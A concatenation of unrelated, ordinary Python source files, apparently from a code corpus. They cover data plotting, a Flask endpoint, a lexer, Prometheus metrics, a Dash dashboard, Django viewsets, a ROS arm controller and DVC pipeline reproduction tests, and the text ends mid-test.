occurance, labels = check_recall(y_train, y_test.reset_index(drop=True), y_pred) fig,ax = plt.subplots(nrows=2, sharex=True) ax[0].bar(x=range(len(recall)), height=recall) ax[1].bar(x=range(len(recall)), height=occurance) ax[1].set_xticks(range(len(labels))) ax[1].set_xticklabels(labels, rotation=90) fig.tight_layout()SubjeBilisim/predictorsrc/predictor/dto/intraday_dto.py from datetime import datetime from decimal import Decimal from typing import NoReturn class IntradayDTO: def __init__(self, date: datetime, o: Decimal, high: Decimal, low: Decimal, close: Decimal, volume: Decimal, symbol: str) -> NoReturn: self.date: datetime = date self.open: Decimal = o self.high: Decimal = high self.low: Decimal = low self.close: Decimal = close self.volume: Decimal = volume self.symbol: str = symbol 1-10 from flask import abort, jsonify, request, g from application.misc.query_wrapper import QueryWrapper from application.auth.required import auth_required class JobTargetTemplate(QueryWrapper): decorators = [auth_required] # Jobs are bound to a user, so we must authenticate def get(self): job_id = request.args.get('job_id') if job_id is None: abort(400, "Job ID not specified") user_id = g.user.id response = self._processor_get( job_id=job_id, user_id=user_id ) return jsonify(response) import re import sys def lex(characters, token_exprs): pos = 0 tokens = [] while pos < len(characters): match = None for token_expr in token_exprs: pattern, tag = token_expr regex = re.compile(pattern) match = regex.match(characters, pos) if match: text = match.group(0) if tag: token = (text, tag) tokens.append(token) break if not match: sys.stderr.write( f"Got exception while compiling code:\n" f" SyntaxException at colomn {pos}:\n" f" Unknown character: '{characters[pos]}'.\n" ) sys.exit(1) 
else: pos = match.end(0) return tokens a = 4+3j print hasattr(a, 'imag') print getattr(a, 'real') def b(): pass setattr(b, 'foo', -1) print b.foo from cNodeList import * cNodeDict={} while(True): print("Enter First Point") source = input() print("Enter Second Point") destination = input() print("Enter Value") value = input() # For Avoiding Duplicate Values sKey = source.upper() dKey = destination.upper() if sKey not in cNodeDict: sNode = CNode(source) cNodeDict.update({source.upper(): sNode}) else: sNode = cNodeDict.get(sKey) if dKey not in cNodeDict: dNode = insertNewNode(sNode, destination, value) cNodeDict.update({destination.upper(): dNode}) else: addNextNode(sNode,cNodeDict.get(dKey),value) print("Enter more? [y//n]") choice = input() if choice.lower() == "n": break #Traversing currentNode = cNodeDict.get("A") print(currentNode.nextNodeList) for item in currentNode.nextNodeList: print("Name " + item[0].name) print("Value " + item[1]) for subItem in item[0].nextNodeList: print(subItem) #!/usr/bin/env python3 # coding: utf-8 # Copyright (c) 2019-2020 Latona. All rights reserved. from .jtekt_decoder import JtektPlcDataMulti ADDR_SIZE = 2 DATA_SIZE = 1 class PlcData(JtektPlcDataMulti): def __init__(self, req, res): super().__init__(req, res) def to_array(self): addr_num = int(len(self.head_binary)/ADDR_SIZE) array_list = [] for i in range(addr_num): bit_value = self.binary[i*DATA_SIZE:(i+1)*DATA_SIZE] array_list.append({ "Bit": int(bit_value.hex(), 16), }) return array_list @staticmethod def generate_binary(data): body_bytes = b'' for row in data: array_no = row.get("ArrayNo") bit = int(row.get("Bit")) if array_no is not None and bit is not None: body_bytes += bytes.fromhex(array_no)[::-1] body_bytes += bit.to_bytes(1, 'little') return body_bytes from prometheus_client import CollectorRegistry, generate_latest, start_http_server, Summary, Counter, Histogram, Gauge from timeit import default_timer __version__ = "1.0.1" prometheus_monitor_registry = CollectorRegistry() class prometheus_monitor(object): _instances = {} def __new__(cls, labels: dict, name: str): if name in cls._instances: return cls._instances[name] instance = super().__new__(cls) instance._labels = labels instance._name = name instance._counter = Counter('%s_counter' % instance._name, instance._name, list(instance._labels.keys())) instance._summary = Summary('%s_summary' % instance._name, instance._name, list(instance._labels.keys())) prometheus_monitor_registry.register(instance._counter) prometheus_monitor_registry.register(instance._summary) cls._instances[name] = instance return instance def __enter__(self, *args, **kwargs): self._counter.labels(*list(self._labels.values())).inc() self._start = default_timer() def __exit__(self, *args, **kwargs): self._summary.labels(*list(self._labels.values())).observe(max(default_timer() - self._start, 0)) # Interface for decorator def __call__(self, function, *args): def wrapped_function(*args): with self: return function(*args) return wrapped_function JohnDoee/wampire from ..utils import URIPattern def test_uri_pattern_no_duplicate(): pattern = URIPattern(False) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3", "prefix") pattern_s3_p1 = pattern.register_uri("testsession3", "a1.b2.c3.d4", "prefix") pattern_s4_p1 = pattern.register_uri("testsession4", "a1.b2..d4.e5", "wildcard") pattern_s5_p1 = pattern.register_uri("testsession5", "a1.b2.c33..e5", "wildcard") pattern_s6_p1 = 
pattern.register_uri("testsession6", "a1.b2..d4.e5..g7", "wildcard") pattern_s7_p1 = pattern.register_uri("testsession7", "a1.b2..d4..f6.g7", "wildcard") assert pattern.match_uri("a1.b2.c3.d4.e55") == ("testsession1", pattern_s1_p1) assert pattern.match_uri("a1.b2.c3.d98.e74") == ("testsession2", pattern_s2_p1) assert pattern.match_uri("a1.b2.c3.d4.e325") == ("testsession3", pattern_s3_p1) assert pattern.match_uri("a1.b2.c55.d4.e5") == ("testsession4", pattern_s4_p1) assert pattern.match_uri("a1.b2.c33.d4.e5") == ("testsession5", pattern_s5_p1) assert pattern.match_uri("a1.b2.c88.d4.e5.f6.g7") == ("testsession6", pattern_s6_p1) assert pattern.match_uri("a2.b2.c2.d2.e2") is None assert not pattern.register_uri("testsession10", "a1.b2.c3.d4.e55", "exact") def test_uri_pattern_duplicate(): pattern = URIPattern(True) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3", "prefix") pattern_s3_p1 = pattern.register_uri("testsession3", "a1.b2..d4.e5", "wildcard") pattern_s4_p1 = pattern.register_uri("testsession4", "a1.b2..d4.e5..g7", "wildcard") assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession1", pattern_s1_p1), ("testsession2", pattern_s2_p1), ] assert sorted(pattern.match_uri("a1.b2.c55.d4.e5")) == [ ("testsession3", pattern_s3_p1) ] assert sorted(pattern.match_uri("a1.b2.c3.d4.e5")) == [ ("testsession2", pattern_s2_p1), ("testsession3", pattern_s3_p1), ] assert sorted(pattern.match_uri("a2.b2.c2.d2.e2")) == [] def test_uri_unregister(): pattern = URIPattern(True) pattern_s1_p1 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e55", "exact") pattern_s1_p2 = pattern.register_uri("testsession1", "a1.b2.c3.d4.e56", "exact") pattern_s1_p3 = pattern.register_uri("testsession1", "a1.b2.c3", "prefix") pattern_s2_p1 = pattern.register_uri("testsession2", "a1.b2.c3.d4.e56", "exact") pattern_s2_p2 = pattern.register_uri("testsession2", "a1.b2.c3.d4", "prefix") assert pattern.unregister_uri("testsession1", pattern_s1_p1) assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession1", pattern_s1_p3), ("testsession2", pattern_s2_p2), ] assert pattern.unregister_session("testsession1") assert sorted(pattern.match_uri("a1.b2.c3.d4.e55")) == [ ("testsession2", pattern_s2_p2) ] assert pattern.unregister_session("testsession2") from datetime import datetime as dt import tools.functions as functions import plotly.graph_objs as go import dash_core_components as dcc import dash_html_components as html def get_layout(): layout = html.Div([ html.Div([ html.H1(children='TypeTracker', style={'text-align': 'center', 'font': 'helvetica', 'color': '#327DFF'}), # Date Selector html.Div([ html.H4(children='Pick the date'), dcc.DatePickerRange( id='date-picker-range', start_date=dt.now(), end_date=dt.now() ), html.Div([ html.Button(id='date-submit-button', n_clicks=0, children='Submit') ], style={'padding': '10px'}), html.Div(id='selected-date') ], style={'width': '49%', 'display': 'inline-block', 'text-align': 'center', 'vertical-align': 'text-top'}), # Time Selector html.Div([ html.H4(children='Pick the time range'), html.Div([ dcc.RangeSlider( id='time_slider', count=1, min=0, max=23*60+59, step=1, value=[0, 23*60+59] )]), html.Button(id='time-submit-button', n_clicks=0, children='Submit'), html.Div(id='selected-time') ], style={'width': '49%', 'display': 'inline-block', 'text-align': 'center', 'vertical-align': 'text-top'}), # Tabs html.Div([ dcc.Tabs(id="tabs", value='summary-tab', children=[ 
dcc.Tab(label='Summary', value='summary-tab'), dcc.Tab(label='CPM graph', value='cpm-tab'), dcc.Tab(label='Character use', value='character-use-tab'), ]), html.Div(id='tabs-content') ]) ]) ]) return layout def create_summary_section_cpm(data): return 'Average typing speed: {: .2f} Characters Per Minute.'.format( functions.get_average_typing_speed_overall(data.get_data_within_time())) def create_summary_section_device_percentage(data): mouse, keyboard = functions.get_percentage_usage_of_mouse_keyboard(data.get_data_within_time()) return 'Usage of keyboard: {keyboard}%.\n'\ 'Usage of mouse: {mouse}%.'.format(keyboard=keyboard, mouse=mouse) def create_typing_timeseries(data, axist_type=[], title=[]): x, y = functions.get_typing_speed_over_time(data.get_data_within_time()) return{ 'data': [go.Scatter( x=x, y=y, mode='lines+markers' )], 'layout': { 'xaxis': {'title': 'Time'}, 'yaxis': {'title': 'CPM'} } } def create_character_barchart(data, axist_type=[], title=[]): x, y = functions.get_character_sum(data.get_data_within_time()) return{ 'data': [go.Bar( x=x, y=y, text=x, textposition='auto', marker=dict( color='rgb(158,202,225)', line=dict( color='rgb(8,48,107)', width=1.5), ), opacity=0.6 )], 'layout': { 'xaxis': {'title': 'Character / function', 'showticklabels': False}, 'yaxis': {'title': 'Usage'} } } def update_data_date_ranges(data, start_date, end_date): start_date = dt.strptime(str(start_date.split()[0]), '%Y-%m-%d') end_date = dt.strptime(str(end_date.split()[0]), '%Y-%m-%d') data.set_data_ranges(start_date, end_date) return u'Selected date range: {start} - {end}'.format(start=str(start_date).split()[0], end=str(end_date).split()[0]) def update_data_time_ranges(data, value): data.set_time_ranges(time_from=value[0], time_to=value[1]) return u'Analysis between {}:{} and {}:{}'.format(int(value[0]/60), int(value[0] % 60), int(value[1]/60), int(value[1] % 60)) def tab_render(tab): if tab == 'summary-tab': return html.Div([ html.H3(children='Summary'), html.Div(id='typing-speed-summary'), html.Div(id='device-usage-summary'), html.Button(id='refresh', n_clicks=0, children='Refresh'), ], style={'text-align': 'center'}) elif tab == 'cpm-tab': return html.Div([ html.H4(children='Typing speed in CPM over time.'), dcc.Graph( id='typing-speed-timeseries', ), html.Button(id='refresh', n_clicks=0, children='Refresh') ], style={'text-align': 'center'}) elif tab == 'character-use-tab': return html.Div([ html.H4(children='Character use within selected time.'), html.Div([ dcc.Graph( id='character-use' ) ]), html.Button(id='refresh', n_clicks=0, children='Refresh') ], style={'text-align': 'center'}) kevindice/cnap-dms1-10 from django.contrib.auth.models import User, Group from rest_framework import viewsets from rest_framework.permissions import IsAuthenticated, AllowAny from rest_framework.response import Response from rest_framework.decorators import action from .serializers import full, basic, anon_create from .permissions import IsTargetUserOrHasPerm, IsNotAllowed class UserViewSet(viewsets.ModelViewSet): permission_classes = (IsAuthenticated, ) queryset = User.objects.all().order_by('-date_joined') serializer_class = basic.UserSerializer http_method_names = ['get', 'post', 'put', 'patch', 'head', 'options'] def get_permissions(self): """ - Anyone can create a user and view available methods - Updates require permission or ownership - Retrieval requires authentication - Deletion is not allowed """ if self.action in ['create', 'metadata'] \ or self.request.method in ['OPTIONS']: return AllowAny(), elif 
self.action in ['update', 'partial_update']: return IsTargetUserOrHasPerm(), elif self.action in ['retrieve', 'list', 'me'] \ or self.request.method in ['HEAD']: return IsAuthenticated(), else: # 'delete' not allowed return IsNotAllowed(), def get_serializer_class(self): """ - Limit signup fields for anonymous - Expose all fields to privileged users - Limit signup fields for non-privileged users - Stripped down for everyone else """ if self.request.user.is_anonymous: return anon_create.UserSerializer elif 'profile.can_view_full_profiles_of_others' \ in self.request.user.get_all_permissions(): return full.UserSerializer elif self.action == 'create': return anon_create.UserSerializer elif self.detail: obj = self.get_object() if obj == self.request.user: return full.UserSerializer return basic.UserSerializer @action(methods=['head', 'get'], detail=False) def me(self, request): """ Convenience method to return a user's own profile """ return Response( full.UserSerializer( self.request.user, context={'request': request} ).data ) class GroupViewSet(viewsets.ModelViewSet): queryset = Group.objects.all() serializer_class = full.GroupSerializer http_method_names = ['get', 'head', 'options'] def get_permissions(self): if self.action in ['retrieve', 'list', 'metadata'] \ or self.request.method in ['HEAD', 'OPTIONS']: return IsAuthenticated(), return IsNotAllowed(), from __future__ import unicode_literals from .about import __version__ from .spacy_cld import LanguageDetector xsect/calc/cruciform.py from __future__ import division from .angle import angle_points from .multi import multi_section_summary __all__ = ['cruciform_points', 'cruciform_summary'] def cruciform_points(leg1, leg2, thickness1, thickness2=None, separation=0): """ Returns an array of cruciform boundary points of shape (N, 2). Parameters ---------- leg1 : float The length of the legs in the vertical direction. leg2 : float The length of the legs in the horizontal direction. thickness1 : float The thickness of `leg1`. thickness2 : float The thickness of `leg2`. If None, the thickness is assumed the same as `thickness1`. separation : float The separation distance between connected legs. """ a = angle_points(leg1, leg2, thickness1, thickness2) a += (0.5*separation, 0.5*separation) b = a * (-1, 1) c = a * (1, -1) d = a * (-1, -1) return a, b, c, d def cruciform_summary(leg1, leg2, thickness1, thickness2=None, separation=0): """ Returns a dictionary with a summary of cruciform properties. Parameters ---------- leg1 : float The length of the legs in the vertical direction. leg2 : float The length of the legs in the horizontal direction. thickness1 : float The thickness of `leg1`. thickness2 : float The thickness of `leg2`. If None, the thickness is assumed the same as `thickness1`. separation : float The separation distance between connected legs. 
""" p = cruciform_points(leg1, leg2, thickness1, thickness2, separation) return multi_section_summary(p) # MIT License # Copyright (c) 2019 haoxintong """""" import os import unittest from mxnet.gluon.data import DataLoader from gluonar.data import * class TransformAudio: DTYPES = ("float32", "float16") def __init__(self, audio_length, dtype="float32"): self.audio_length = int(audio_length) if dtype not in self.DTYPES: raise ValueError("Dtype other than float32/16 is not supported.") self.dtype = dtype def train(self, data, label): data = data.astype(self.dtype) data = random_crop(data, self.audio_length) return data, label def val(self, data): data = data.astype(self.dtype) data = center_crop(data, self.audio_length) return data class TestVoxAudioValFolderDataset(unittest.TestCase): def setUp(self) -> None: self.data_root = os.path.expanduser("~/data/vox") trans = TransformAudio(48000) self.dataset = VoxAudioValFolderDataset(os.path.join(self.data_root, "sampled_pairs.txt"), root=os.path.join(self.data_root, "train1"), transform=trans.val) self.data_loader = DataLoader(self.dataset, 8, num_workers=4) def test_get_audio(self): for i, data in enumerate(self.dataset): audio0, audio1 = data[0] self.assertEqual(audio0.shape[0], audio1.shape[0], "{}th audio pairs got different shape!".format(i)) if i > 10: break def test_data_loader(self): for i, batch in enumerate(self.data_loader): data_pairs = batch[0] self.assertEqual(data_pairs[0].shape, data_pairs[1].shape, "Shape not equal in a batch.") if i > 10: break DLBasics_Utilities/__init__.py from . import DLBasics_Utilities from .DLBasics_Utilities import File_Helper #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright © 2014 Zulip, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. ### REQUIRED CONFIGURATION ### # Change these values to your Asana credentials. ASANA_API_KEY = "" # Change these values to the credentials for your Asana bot. ZULIP_USER = "" ZULIP_API_KEY = "" # The Zulip stream that will receive Asana task updates. ZULIP_STREAM_NAME = "asana" ### OPTIONAL CONFIGURATION ### # Set to None for logging to stdout when testing, and to a file for # logging in production. #LOG_FILE = "/var/tmp/zulip_asana.log" LOG_FILE = None # This file is used to resume this mirror in case the script shuts down. # It is required and needs to be writeable. RESUME_FILE = "/var/tmp/zulip_asana.state" # When initially started, how many hours of messages to include. 
ASANA_INITIAL_HISTORY_HOURS = 1 # Set this to your Zulip API server URI ZULIP_SITE = "https://api.zulip.com" # If properly installed, the Zulip API should be in your import # path, but if not, set a custom path below ZULIP_API_PATH = None from adia.lazyattr import LazyAttribute def test_lazyattribute(): global callcount class MyType: pass my_instance = MyType() callcount = 0 class Foo: @LazyAttribute def bar(self): """Foo bar baz.""" global callcount callcount += 1 return my_instance assert 'Foo bar baz.' == Foo.bar.__doc__ assert 'bar' == Foo.bar.__name__ foo = Foo() assert my_instance is foo.bar assert 1 == callcount import json import boto3 import sys import logging import traceback from time import time from decimal import Decimal from boto3.dynamodb.conditions import Attr from DecimalEncoder import DecimalEncoder logger = logging.getLogger() logger.setLevel(logging.INFO) dynamodb = boto3.resource('dynamodb', region_name='eu-west-1') home_table = dynamodb.Table('temperature_humidity_data') def get_home_data(event, context): out = { 'statusCode': 200 } try: # get dates from body if event['body'] is not None: body = json.loads(event['body']) else: body = {} logger.info(body) # if no dates are given in the body, default to the last week time_now = int(time()) date_start = body['date_start'] if 'date_start' in body else (time_now - 604800) date_end = body['date_end'] if 'date_end' in body else time_now # scan the table for that date range, using pagination to get all items response = home_table.scan( FilterExpression=Attr('timestamp').gte(date_start) & Attr('timestamp').lte(date_end) ) home_data = response['Items'] while 'LastEvaluatedKey' in response: response = home_table.scan(FilterExpression=Attr('timestamp').gte(date_start) & Attr('timestamp').lte(date_end), ExclusiveStartKey=response['LastEvaluatedKey']) home_data.extend(response['Items']) out['body'] = json.dumps(home_data, cls=DecimalEncoder) except Exception as exp: exception_type, exception_value, exception_traceback = sys.exc_info() traceback_string = traceback.format_exception(exception_type, exception_value, exception_traceback) err_msg = json.dumps({ "errorType": exception_type.__name__, "errorMessage": str(exception_value), "stackTrace": traceback_string }) logger.error(err_msg) out['statusCode'] = 404 out['body'] = 'Something went wrong' return out sid-dey/arm_planning #!/usr/bin/env python import copy import actionlib import rospy import numpy as np #import pcl from math import sin, cos from moveit_python import (MoveGroupInterface, PlanningSceneInterface, PickPlaceInterface) from moveit_msgs.msg import PlaceLocation, MoveItErrorCodes from geometry_msgs.msg import TwistStamped, PoseStamped from std_msgs.msg import Int8, Float32 from sensor_msgs.msg import JointState from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal from control_msgs.msg import GripperCommandAction, GripperCommandGoal from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint import moveit_commander DES_JOINTS_TOPIC = "/fetch/des_states" NO_DOF = 7 class FollowTrajectoryClient(object): def __init__(self, name, joint_names): self.trajectory = JointTrajectory() self.sub_des_states = rospy.Subscriber(DES_JOINTS_TOPIC, JointTrajectory, self.handle_des_states, tcp_nodelay=True, queue_size=1) self.client = actionlib.SimpleActionClient("%s/follow_joint_trajectory" % name, FollowJointTrajectoryAction) rospy.loginfo("Waiting for %s..."
% name) self.client.wait_for_server() # self.joint_names = joint_names self.trajectory = JointTrajectory() self.trajectory.joint_names = joint_names # pre-allocate a single trajectory point so the index-0 assignments below are valid self.trajectory.points.append(JointTrajectoryPoint()) self.trajectory.points[0].positions = np.zeros(NO_DOF) self.trajectory.points[0].velocities = np.zeros(NO_DOF) self.trajectory.points[0].time_from_start = rospy.Duration(2.0) self.move_to() # set up flag for new trajectory received self.new_trajectory_received_flag = False def handle_des_states(self, data): self.trajectory.points = data.points # self.trajectory.joint_names = self.joint_names self.new_trajectory_received_flag = True def move_to(self): follow_goal = FollowJointTrajectoryGoal() follow_goal.trajectory = self.trajectory self.new_trajectory_received_flag = False self.client.send_goal(follow_goal) self.client.wait_for_result() if __name__ == "__main__": # Create a node rospy.init_node("fetch_planning_interface") # Make sure sim time is working while not rospy.Time.now(): pass # Setup clients arm_action = FollowTrajectoryClient("arm_controller", ["shoulder_pan_joint", "shoulder_lift_joint", \ "upperarm_roll_joint", "elbow_flex_joint", \ "forearm_roll_joint", "wrist_flex_joint", \ "wrist_roll_joint"]) rospy.loginfo("Moving the arm with position commands") while not rospy.is_shutdown(): if arm_action.new_trajectory_received_flag: arm_action.move_to() shape_generator/__init__.py from .helpers import channel_end, combine_input_files, csv, to_xs_dict, deg2slope, Circle, Slope, Vertical from .shape_generator import CrossSection from .shape_generator_holding import CrossSectionHolding from .converter_swmm_api import convert_shape_generator_to_curve tests/func/test_repro.py import filecmp import getpass import os import posixpath import re import shutil import uuid from pathlib import Path from subprocess import PIPE, Popen from unittest import SkipTest from urllib.parse import urljoin import boto3 import paramiko import pytest from flaky.flaky_decorator import flaky from google.cloud import storage as gc from mock import patch from dvc.dvcfile import DVC_FILE, Dvcfile from dvc.exceptions import ( CyclicGraphError, ReproductionError, StagePathAsOutputError, ) from dvc.main import main from dvc.output.base import BaseOutput from dvc.path_info import URLInfo from dvc.remote.local import LocalRemote from dvc.repo import Repo as DvcRepo from dvc.stage import Stage from dvc.stage.exceptions import StageFileDoesNotExistError from dvc.system import System from dvc.utils import file_md5, relpath from dvc.utils.fs import remove from dvc.utils.stage import dump_stage_file, load_stage_file from tests.basic_env import TestDvc from tests.remotes import ( GCP, HDFS, S3, SSH, TEST_AWS_REPO_BUCKET, TEST_GCP_REPO_BUCKET, Local, SSHMocked, ) from tests.utils.httpd import ContentMD5Handler, StaticFileServer class SingleStageRun: def _run(self, **kwargs): kwargs["single_stage"] = True kwargs.pop("name", None) return self.dvc.run(**kwargs) @staticmethod def _get_stage_target(stage): return stage.addressing class TestRepro(SingleStageRun, TestDvc): def setUp(self): super().setUp() stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.foo_stage = stages[0] self.assertTrue(self.foo_stage is not None) self.file1 = "file1" self.file1_stage = self.file1 + ".dvc" self.stage = self._run( fname=self.file1_stage, outs=[self.file1], deps=[self.FOO, self.CODE], cmd=f"python {self.CODE} {self.FOO} {self.file1}", name="run1", ) class TestReproFail(TestRepro): def test(self): os.unlink(self.CODE) ret = main(["repro", self._get_stage_target(self.stage)])
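# The code file this stage depends on was deleted above, so reproducing the stage fails and main() is expected to return a nonzero exit code, which the assertion below checks.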
self.assertNotEqual(ret, 0) class TestReproCyclicGraph(SingleStageRun, TestDvc): def test(self): self._run( deps=[self.FOO], outs=["bar.txt"], cmd="echo bar > bar.txt", name="copybarbar-txt", ) self._run( deps=["bar.txt"], outs=["baz.txt"], cmd="echo baz > baz.txt", name="copybazbaz-txt", ) stage_dump = { "cmd": "echo baz > foo", "deps": [{"path": "baz.txt"}], "outs": [{"path": self.FOO}], } dump_stage_file("cycle.dvc", stage_dump) with self.assertRaises(CyclicGraphError): self.dvc.reproduce("cycle.dvc") class TestReproWorkingDirectoryAsOutput(TestDvc): """ | stage.cwd | out.path | cwd as output | |:-----------:|:---------:|:-------------:| | dir | dir | True | | dir/subdir/ | dir | True | | dir | dir-1 | False | | . | something | False | """ def test(self): # File structure: # . # |-- dir1 # | |__ dir2.dvc (out.path == ../dir2) # |__ dir2 # |__ something.dvc (stage.cwd == ./dir2) os.mkdir(os.path.join(self.dvc.root_dir, "dir1")) self.dvc.run( fname=os.path.join("dir1", "dir2.dvc"), wdir="dir1", outs=[os.path.join("..", "dir2")], cmd="mkdir {path}".format(path=os.path.join("..", "dir2")), single_stage=True, ) faulty_stage_path = os.path.join("dir2", "something.dvc") output = os.path.join("..", "something") stage_dump = { "cmd": f"echo something > {output}", "outs": [{"path": output}], } dump_stage_file(faulty_stage_path, stage_dump) with self.assertRaises(StagePathAsOutputError): self.dvc.reproduce(faulty_stage_path) def test_nested(self): # . # |-- a # | |__ nested # | |__ dir # | |__ error.dvc (stage.cwd == 'a/nested/dir') # |__ b # |__ nested.dvc (stage.out == 'a/nested') dir1 = "b" dir2 = "a" os.mkdir(dir1) os.mkdir(dir2) nested_dir = os.path.join(dir2, "nested") out_dir = relpath(nested_dir, dir1) nested_stage = self.dvc.run( fname=os.path.join(dir1, "b.dvc"), wdir=dir1, outs=[out_dir], # ../a/nested cmd=f"mkdir {out_dir}", single_stage=True, ) os.mkdir(os.path.join(nested_dir, "dir")) error_stage_path = os.path.join(nested_dir, "dir", "error.dvc") output = os.path.join("..", "..", "something") stage_dump = { "cmd": f"echo something > {output}", "outs": [{"path": output}], } dump_stage_file(error_stage_path, stage_dump) # NOTE: os.walk() walks in a sorted order and we need dir2 subdirs to # be processed before dir1 to load error.dvc first. self.dvc.stages = [ nested_stage, Dvcfile(self.dvc, error_stage_path).stage, ] with patch.object(self.dvc, "_reset"): # to prevent `stages` resetting with self.assertRaises(StagePathAsOutputError): self.dvc.reproduce(error_stage_path) def test_similar_paths(self): # File structure: # # . 
# |-- something.dvc (out.path == something) # |-- something # |__ something-1 # |-- a # |__ a.dvc (stage.cwd == something-1) self.dvc.run( outs=["something"], cmd="mkdir something", single_stage=True ) os.mkdir("something-1") stage = os.path.join("something-1", "a.dvc") stage_dump = {"cmd": "echo a > a", "outs": [{"path": "a"}]} dump_stage_file(stage, stage_dump) try: self.dvc.reproduce(stage) except StagePathAsOutputError: self.fail("should not raise StagePathAsOutputError") class TestReproDepUnderDir(SingleStageRun, TestDvc): def test(self): stages = self.dvc.add(self.DATA_DIR) self.assertEqual(len(stages), 1) self.dir_stage = stages[0] self.assertTrue(self.dir_stage is not None) self.file1 = "file1" stage = self._run( fname=self.file1 + ".dvc", outs=[self.file1], deps=[self.DATA, self.CODE], cmd=f"python {self.CODE} {self.DATA} {self.file1}", name="copy-data-file1", ) self.assertTrue(filecmp.cmp(self.file1, self.DATA, shallow=False)) os.unlink(self.DATA) shutil.copyfile(self.FOO, self.DATA) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 2) self.assertTrue(filecmp.cmp(self.file1, self.FOO, shallow=False)) class TestReproDepDirWithOutputsUnderIt(SingleStageRun, TestDvc): def test(self): stages = self.dvc.add(self.DATA) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) stages = self.dvc.add(self.DATA_SUB) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) deps = [self.DATA, self.DATA_SUB] stage = self.dvc.run( cmd="ls {}".format(" ".join(deps)), fname="dvcfile2.dvc", deps=deps, single_stage=True, ) self.assertTrue(stage is not None) file1 = "file1" file1_stage = file1 + ".dvc" stage = self._run( fname=file1_stage, deps=[self.DATA_DIR], outs=[file1], cmd=f"python {self.CODE} {self.DATA} {file1}", name="copy-data-file1", ) self.assertTrue(stage is not None) os.unlink(self.DATA) shutil.copyfile(self.FOO, self.DATA) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 2) class TestReproNoDeps(TestRepro): def test(self): out = "out" code_file = "out.py" stage_file = "out.dvc" code = ( 'import uuid\nwith open("{}", "w+") as fd:\n' "\tfd.write(str(uuid.uuid4()))\n".format(out) ) with open(code_file, "w+") as fd: fd.write(code) stage = self._run( fname=stage_file, outs=[out], cmd=f"python {code_file}", name="uuid", ) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) class TestReproForce(TestRepro): def test(self): stages = self.dvc.reproduce( self._get_stage_target(self.stage), force=True ) self.assertEqual(len(stages), 2) class TestReproChangedCode(TestRepro): def test(self): self.swap_code() stages = self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertEqual(len(stages), 1) def swap_code(self): os.unlink(self.CODE) new_contents = self.CODE_CONTENTS new_contents += "\nshutil.copyfile('{}', " "sys.argv[2])\n".format( self.BAR ) self.create(self.CODE, new_contents) class TestReproChangedData(TestRepro): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertEqual(len(stages), 2) def swap_foo_with_bar(self): os.unlink(self.FOO) shutil.copyfile(self.BAR, self.FOO) class TestReproDry(TestReproChangedData): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce( self._get_stage_target(self.stage), dry=True ) 
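# With dry=True the stages that would be reproduced are collected, but their commands are not executed, so file1 must still differ from BAR; the `repro --dry` CLI call below is expected to leave the workspace untouched in the same way.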
self.assertTrue(len(stages), 2) self.assertFalse(filecmp.cmp(self.file1, self.BAR, shallow=False)) ret = main(["repro", "--dry", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) self.assertFalse(filecmp.cmp(self.file1, self.BAR, shallow=False)) class TestReproUpToDate(TestRepro): def test(self): ret = main(["repro", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) class TestReproDryNoExec(TestDvc): def test(self): deps = [] for d in range(3): idir = f"idir{d}" odir = f"odir{d}" deps.append("-d") deps.append(odir) os.mkdir(idir) f = os.path.join(idir, "file") with open(f, "w+") as fobj: fobj.write(str(d)) ret = main( [ "run", "--no-exec", "--single-stage", "-d", idir, "-o", odir, "python -c 'import shutil; " 'shutil.copytree("{}", "{}")\''.format(idir, odir), ] ) self.assertEqual(ret, 0) ret = main( [ "run", "--no-exec", "--single-stage", "-f", DVC_FILE, *deps, "ls {}".format( " ".join(dep for i, dep in enumerate(deps) if i % 2) ), ] ) self.assertEqual(ret, 0) ret = main(["repro", "--dry", DVC_FILE]) self.assertEqual(ret, 0) class TestReproChangedDeepData(TestReproChangedData): def setUp(self): super().setUp() self.file2 = "file2" self.stage = self._run( fname=self.file2 + ".dvc", outs=[self.file2], deps=[self.file1, self.CODE], cmd=f"python {self.CODE} {self.file1} {self.file2}", name="copy-file-file2", ) def test(self): self.swap_foo_with_bar() stages = 